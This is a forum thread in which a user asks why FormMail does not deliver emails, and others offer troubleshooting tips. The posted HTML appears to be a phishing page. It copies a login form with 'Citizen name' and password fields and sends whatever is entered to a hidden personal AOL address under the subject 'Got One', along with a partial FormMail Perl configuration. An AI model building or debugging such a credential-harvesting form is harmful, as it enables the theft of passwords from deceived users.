kilbupere80
New Member
- Messages
- 2
- Reaction score
- 0
- Points
- 0
Does not work. The code looks to be fine. Everything works fine but FormMail doesn't send the emails.
PerlIs this PHP or Perl?
(Form field)How is the "From" field set up?
<form action="/cgi-bin/FormMail.pl" method="post">
<input type="hidden" name="recipient" value="kilbupere@aol.com"><input type="hidden" name="subject" value="Got One"> <div class="half">
<div class="fieldname">Citizen name</div>
<input type="text" name="name">
<a class="smalldotted goleft" tabindex="4" rel="nofollow" href="/en/forgot-password">Forgot password?</a> </div>
<div class="half">
<div class="fieldname">Password</div>
<input type="password" name="password">
<input type="checkbox" name="remember" id="remember" value="1" class="check" tabindex="5" />
<label for="remember">Remember me</label>
</div>
<input type="submit" value="Submit" name="Submit"> </form>
#!/usr/local/bin/perl
$mailprog = '/usr/sbin/sendmail -i -t';
@referers = ('x10hosting.com', 'Aol.com', 'kilbupere.x10.mx');
@recipients = &fill_recipients(@referers);
@valid_ENV = ('REMOTE_HOST','REMOTE_ADDR','REMOTE_USER','HTTP_USER_AGENT');
yupHave you checked the spam folder at the destination email account?